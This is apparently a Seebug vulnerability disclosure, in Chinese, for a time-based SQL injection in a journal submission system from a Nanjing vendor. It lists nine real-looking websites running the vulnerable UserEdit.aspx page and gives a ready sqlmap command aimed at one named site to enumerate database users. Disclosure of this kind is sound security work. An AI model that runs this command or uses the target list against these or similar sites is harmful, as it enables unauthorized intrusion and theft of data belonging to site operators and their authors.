某期刊投稿系统SQL注入漏洞

2014-11-21T00:00:00
ID SSV:95737
Type seebug
Reporter Root
Modified 2014-11-21T00:00:00

Description

简要描述:

RT

详细说明:

南京杰诺瀚期刊投稿系统存在SQL延迟注入漏洞,可获取数据库任意数据... 官网:http://www.025journal.com/

<img src="https://images.seebug.org/upload/201411/19103213fee7c9b2acc1c9232ba1bce0beb95726.jpg" alt="QQ图片20141119101310.jpg" width="600" onerror="javascript:errimg(this);">

案例: http://www.cjge-manuscriptcentral.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.lcmzxzz.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://j.chinatransducers.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://gaojian.xhnj.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://xb.cuit.edu.cn/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.jsnyxb.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.lcsjwk.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.linpi.net/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.mfskin.net/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 由于是延时注入

漏洞证明:

只演示1个站了 http://www.cjge-manuscriptcentral.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 sqlmap.py -u "http://www.cjge-manuscriptcentral.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --users -v 3 --batch

<img src="https://images.seebug.org/upload/201411/19104553d13158e2d5a000dd3ba1aba0791c6a03.png" alt="QQ图片20141119104531.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201411/191046001d7f178dd2c63d2f0926af1d72e16f60.jpg" alt="QQ图片20141119104545.jpg" width="600" onerror="javascript:errimg(this);">